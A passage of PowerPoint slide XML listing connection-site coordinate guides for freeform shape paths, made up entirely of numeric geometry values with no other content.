              <a:gd name="connsiteX47" fmla="*/ 614105 w 1514862"/>
              <a:gd name="connsiteY47" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 615089 w 1514862"/>
              <a:gd name="connsiteY48" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 610723 w 1514862"/>
              <a:gd name="connsiteY49" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 617400 w 1514862"/>
              <a:gd name="connsiteY50" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 614333 w 1514862"/>
              <a:gd name="connsiteY51" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 621163 w 1514862"/>
              <a:gd name="connsiteY52" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 628199 w 1514862"/>
              <a:gd name="connsiteY53" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 630930 w 1514862"/>
              <a:gd name="connsiteY54" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 627634 w 1514862"/>
              <a:gd name="connsiteY55" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 629188 w 1514862"/>
              <a:gd name="connsiteY56" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 636097 w 1514862"/>
              <a:gd name="connsiteY57" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 631953 w 1514862"/>
              <a:gd name="connsiteY58" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 647356 w 1514862"/>
              <a:gd name="connsiteY59" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 641510 w 1514862"/>
              <a:gd name="connsiteY60" fmla="*/ 4801535 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 649179 w 1514862"/>
              <a:gd name="connsiteY61" fmla="*/ 4797794 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 650473 w 1514862"/>
              <a:gd name="connsiteY62" fmla="*/ 4784526 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 652257 w 1514862"/>
              <a:gd name="connsiteY63" fmla="*/ 4781211 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 661044 w 1514862"/>
              <a:gd name="connsiteY64" fmla="*/ 4761984 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 657092 w 1514862"/>
              <a:gd name="connsiteY65" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 652572 w 1514862"/>
              <a:gd name="connsiteY66" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 647655 w 1514862"/>
              <a:gd name="connsiteY67" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 644220 w 1514862"/>
              <a:gd name="connsiteY68" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 624873 w 1514862"/>
              <a:gd name="connsiteY69" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 628946 w 1514862"/>
              <a:gd name="connsiteY70" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 614202 w 1514862"/>
              <a:gd name="connsiteY71" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 615351 w 1514862"/>
              <a:gd name="connsiteY72" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 613927 w 1514862"/>
              <a:gd name="connsiteY73" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 600222 w 1514862"/>
              <a:gd name="connsiteY74" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 601820 w 1514862"/>
              <a:gd name="connsiteY75" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 595242 w 1514862"/>
              <a:gd name="connsiteY76" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 596573 w 1514862"/>
              <a:gd name="connsiteY77" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 600927 w 1514862"/>
              <a:gd name="connsiteY78" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 606005 w 1514862"/>
              <a:gd name="connsiteY79" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 628599 w 1514862"/>
              <a:gd name="connsiteY80" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 628024 w 1514862"/>
              <a:gd name="connsiteY81" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 628331 w 1514862"/>
              <a:gd name="connsiteY82" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 628358 w 1514862"/>
              <a:gd name="connsiteY83" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 626973 w 1514862"/>
              <a:gd name="connsiteY84" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 625857 w 1514862"/>
              <a:gd name="connsiteY85" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 627590 w 1514862"/>
              <a:gd name="connsiteY86" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 631333 w 1514862"/>
              <a:gd name="connsiteY87" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 630799 w 1514862"/>
              <a:gd name="connsiteY88" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 639495 w 1514862"/>
              <a:gd name="connsiteY89" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 646841 w 1514862"/>
              <a:gd name="connsiteY90" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 646137 w 1514862"/>
              <a:gd name="connsiteY91" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 649580 w 1514862"/>
              <a:gd name="connsiteY92" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 657118 w 1514862"/>
              <a:gd name="connsiteY93" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 658789 w 1514862"/>
              <a:gd name="connsiteY94" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 676352 w 1514862"/>
              <a:gd name="connsiteY95" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 676777 w 1514862"/>
              <a:gd name="connsiteY96" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 678600 w 1514862"/>
              <a:gd name="connsiteY97" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 665435 w 1514862"/>
              <a:gd name="connsiteY98" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 665936 w 1514862"/>
              <a:gd name="connsiteY99" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 653536 w 1514862"/>
              <a:gd name="connsiteY100" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 638721 w 1514862"/>
              <a:gd name="connsiteY101" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 639386 w 1514862"/>
              <a:gd name="connsiteY102" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 630254 w 1514862"/>
              <a:gd name="connsiteY103" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 616863 w 1514862"/>
              <a:gd name="connsiteY104" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 589593 w 1514862"/>
              <a:gd name="connsiteY105" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 532207 w 1514862"/>
              <a:gd name="connsiteY106" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 481125 w 1514862"/>
              <a:gd name="connsiteY107" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 461219 w 1514862"/>
              <a:gd name="connsiteY108" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 451942 w 1514862"/>
              <a:gd name="connsiteY109" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 438903 w 1514862"/>
              <a:gd name="connsiteY110" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 444902 w 1514862"/>
              <a:gd name="connsiteY111" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 447514 w 1514862"/>
              <a:gd name="connsiteY112" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 423843 w 1514862"/>
              <a:gd name="connsiteY113" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 413730 w 1514862"/>
              <a:gd name="connsiteY114" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 397947 w 1514862"/>
              <a:gd name="connsiteY115" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 395405 w 1514862"/>
              <a:gd name="connsiteY116" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 396398 w 1514862"/>
              <a:gd name="connsiteY117" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 388204 w 1514862"/>
              <a:gd name="connsiteY118" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 369382 w 1514862"/>
              <a:gd name="connsiteY119" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 345939 w 1514862"/>
              <a:gd name="connsiteY120" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 299738 w 1514862"/>
              <a:gd name="connsiteY121" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 272049 w 1514862"/>
              <a:gd name="connsiteY122" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 271175 w 1514862"/>
              <a:gd name="connsiteY123" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 251970 w 1514862"/>
              <a:gd name="connsiteY124" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 265050 w 1514862"/>
              <a:gd name="connsiteY125" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 257792 w 1514862"/>
              <a:gd name="connsiteY126" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 243877 w 1514862"/>
              <a:gd name="connsiteY127" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 252184 w 1514862"/>
              <a:gd name="connsiteY128" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 253372 w 1514862"/>
              <a:gd name="connsiteY129" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 258057 w 1514862"/>
              <a:gd name="connsiteY130" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 250339 w 1514862"/>
              <a:gd name="connsiteY131" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 239645 w 1514862"/>
              <a:gd name="connsiteY132" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 228381 w 1514862"/>
              <a:gd name="connsiteY133" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 229837 w 1514862"/>
              <a:gd name="connsiteY134" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 232073 w 1514862"/>
              <a:gd name="connsiteY135" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 224702 w 1514862"/>
              <a:gd name="connsiteY136" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 194110 w 1514862"/>
              <a:gd name="connsiteY137" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 173060 w 1514862"/>
              <a:gd name="connsiteY138" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 172618 w 1514862"/>
              <a:gd name="connsiteY139" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 158289 w 1514862"/>
              <a:gd name="connsiteY140" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 143708 w 1514862"/>
              <a:gd name="connsiteY141" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 148719 w 1514862"/>
              <a:gd name="connsiteY142" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 134661 w 1514862"/>
              <a:gd name="connsiteY143" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 134342 w 1514862"/>
              <a:gd name="connsiteY144" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 113968 w 1514862"/>
              <a:gd name="connsiteY145" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 104404 w 1514862"/>
              <a:gd name="connsiteY146" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 110826 w 1514862"/>
              <a:gd name="connsiteY147" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 110047 w 1514862"/>
              <a:gd name="connsiteY148" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 99451 w 1514862"/>
              <a:gd name="connsiteY149" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 76471 w 1514862"/>
              <a:gd name="connsiteY150" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 33963 w 1514862"/>
              <a:gd name="connsiteY151" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 12635 w 1514862"/>
              <a:gd name="connsiteY152" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 3963 w 1514862"/>
              <a:gd name="connsiteY153" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 25635 w 1514862"/>
              <a:gd name="connsiteY154" fmla="*/ 47336 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 6323 w 1514862"/>
              <a:gd name="connsiteY155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27640 w 1508539"/>
              <a:gd name="connsiteY151" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 6312 w 1508539"/>
              <a:gd name="connsiteY152" fmla="*/ 211375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27640 w 1508539"/>
              <a:gd name="connsiteY151" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 32747 w 1508539"/>
              <a:gd name="connsiteY152" fmla="*/ 158081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32747 w 1508539"/>
              <a:gd name="connsiteY152" fmla="*/ 158081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23935 w 1508539"/>
              <a:gd name="connsiteY152" fmla="*/ 160886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23935 w 1508539"/>
              <a:gd name="connsiteY152" fmla="*/ 160886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0191 w 1508539"/>
              <a:gd name="connsiteY149" fmla="*/ 404917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23935 w 1508539"/>
              <a:gd name="connsiteY152" fmla="*/ 160886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90191 w 1508539"/>
              <a:gd name="connsiteY148" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 70148 w 1508539"/>
              <a:gd name="connsiteY149" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 36452 w 1508539"/>
              <a:gd name="connsiteY150" fmla="*/ 268519 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 23935 w 1508539"/>
              <a:gd name="connsiteY151" fmla="*/ 160886 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 19312 w 1508539"/>
              <a:gd name="connsiteY152" fmla="*/ 47336 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 0 w 1508539"/>
              <a:gd name="connsiteY15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89816 w 1508539"/>
              <a:gd name="connsiteY147" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 90191 w 1508539"/>
              <a:gd name="connsiteY148" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 70148 w 1508539"/>
              <a:gd name="connsiteY149" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 36452 w 1508539"/>
              <a:gd name="connsiteY150" fmla="*/ 268519 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 23935 w 1508539"/>
              <a:gd name="connsiteY151" fmla="*/ 160886 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 19312 w 1508539"/>
              <a:gd name="connsiteY152" fmla="*/ 47336 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 0 w 1508539"/>
              <a:gd name="connsiteY15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106893 w 1508539"/>
              <a:gd name="connsiteY146" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 89816 w 1508539"/>
              <a:gd name="connsiteY147" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 90191 w 1508539"/>
              <a:gd name="connsiteY148" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 70148 w 1508539"/>
              <a:gd name="connsiteY149" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 36452 w 1508539"/>
              <a:gd name="connsiteY150" fmla="*/ 268519 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 23935 w 1508539"/>
              <a:gd name="connsiteY151" fmla="*/ 160886 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 19312 w 1508539"/>
              <a:gd name="connsiteY152" fmla="*/ 47336 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 0 w 1508539"/>
              <a:gd name="connsiteY15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54721 w 1508539"/>
              <a:gd name="connsiteY63" fmla="*/ 4761984 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 650769 w 1508539"/>
              <a:gd name="connsiteY64" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 646249 w 1508539"/>
              <a:gd name="connsiteY65" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 641332 w 1508539"/>
              <a:gd name="connsiteY66" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 637897 w 1508539"/>
              <a:gd name="connsiteY67" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 618550 w 1508539"/>
              <a:gd name="connsiteY68" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 622623 w 1508539"/>
              <a:gd name="connsiteY69" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 607879 w 1508539"/>
              <a:gd name="connsiteY70" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 609028 w 1508539"/>
              <a:gd name="connsiteY71" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 607604 w 1508539"/>
              <a:gd name="connsiteY72" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 593899 w 1508539"/>
              <a:gd name="connsiteY73" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 595497 w 1508539"/>
              <a:gd name="connsiteY74" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 588919 w 1508539"/>
              <a:gd name="connsiteY75" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 590250 w 1508539"/>
              <a:gd name="connsiteY76" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 594604 w 1508539"/>
              <a:gd name="connsiteY77" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 599682 w 1508539"/>
              <a:gd name="connsiteY78" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 622276 w 1508539"/>
              <a:gd name="connsiteY79" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 621701 w 1508539"/>
              <a:gd name="connsiteY80" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 622008 w 1508539"/>
              <a:gd name="connsiteY81" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 622035 w 1508539"/>
              <a:gd name="connsiteY82" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 620650 w 1508539"/>
              <a:gd name="connsiteY83" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 619534 w 1508539"/>
              <a:gd name="connsiteY84" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 621267 w 1508539"/>
              <a:gd name="connsiteY85" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 625010 w 1508539"/>
              <a:gd name="connsiteY86" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 624476 w 1508539"/>
              <a:gd name="connsiteY87" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 633172 w 1508539"/>
              <a:gd name="connsiteY88" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 640518 w 1508539"/>
              <a:gd name="connsiteY89" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 639814 w 1508539"/>
              <a:gd name="connsiteY90" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 643257 w 1508539"/>
              <a:gd name="connsiteY91" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 650795 w 1508539"/>
              <a:gd name="connsiteY92" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 652466 w 1508539"/>
              <a:gd name="connsiteY93" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 670029 w 1508539"/>
              <a:gd name="connsiteY94" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 670454 w 1508539"/>
              <a:gd name="connsiteY95" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 672277 w 1508539"/>
              <a:gd name="connsiteY96" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 659112 w 1508539"/>
              <a:gd name="connsiteY97" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 659613 w 1508539"/>
              <a:gd name="connsiteY98" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 647213 w 1508539"/>
              <a:gd name="connsiteY99" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 632398 w 1508539"/>
              <a:gd name="connsiteY100" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 633063 w 1508539"/>
              <a:gd name="connsiteY101" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 623931 w 1508539"/>
              <a:gd name="connsiteY102" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 610540 w 1508539"/>
              <a:gd name="connsiteY103" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 583270 w 1508539"/>
              <a:gd name="connsiteY104" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 525884 w 1508539"/>
              <a:gd name="connsiteY105" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 474802 w 1508539"/>
              <a:gd name="connsiteY106" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 454896 w 1508539"/>
              <a:gd name="connsiteY107" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 445619 w 1508539"/>
              <a:gd name="connsiteY108" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 432580 w 1508539"/>
              <a:gd name="connsiteY109" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 438579 w 1508539"/>
              <a:gd name="connsiteY110" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 441191 w 1508539"/>
              <a:gd name="connsiteY111" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 417520 w 1508539"/>
              <a:gd name="connsiteY112" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 407407 w 1508539"/>
              <a:gd name="connsiteY113" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 391624 w 1508539"/>
              <a:gd name="connsiteY114" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 389082 w 1508539"/>
              <a:gd name="connsiteY115" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 390075 w 1508539"/>
              <a:gd name="connsiteY116" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 381881 w 1508539"/>
              <a:gd name="connsiteY117" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 363059 w 1508539"/>
              <a:gd name="connsiteY118" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 339616 w 1508539"/>
              <a:gd name="connsiteY119" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 293415 w 1508539"/>
              <a:gd name="connsiteY120" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 265726 w 1508539"/>
              <a:gd name="connsiteY121" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 264852 w 1508539"/>
              <a:gd name="connsiteY122" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 245647 w 1508539"/>
              <a:gd name="connsiteY123" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 258727 w 1508539"/>
              <a:gd name="connsiteY124" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 251469 w 1508539"/>
              <a:gd name="connsiteY125" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 237554 w 1508539"/>
              <a:gd name="connsiteY126" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 245861 w 1508539"/>
              <a:gd name="connsiteY127" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 247049 w 1508539"/>
              <a:gd name="connsiteY128" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 251734 w 1508539"/>
              <a:gd name="connsiteY129" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 244016 w 1508539"/>
              <a:gd name="connsiteY130" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 233322 w 1508539"/>
              <a:gd name="connsiteY131" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 222058 w 1508539"/>
              <a:gd name="connsiteY132" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 223514 w 1508539"/>
              <a:gd name="connsiteY133" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 225750 w 1508539"/>
              <a:gd name="connsiteY134" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 218379 w 1508539"/>
              <a:gd name="connsiteY135" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 187787 w 1508539"/>
              <a:gd name="connsiteY136" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 166737 w 1508539"/>
              <a:gd name="connsiteY137" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 166295 w 1508539"/>
              <a:gd name="connsiteY138" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 151966 w 1508539"/>
              <a:gd name="connsiteY139" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 137385 w 1508539"/>
              <a:gd name="connsiteY140" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 142396 w 1508539"/>
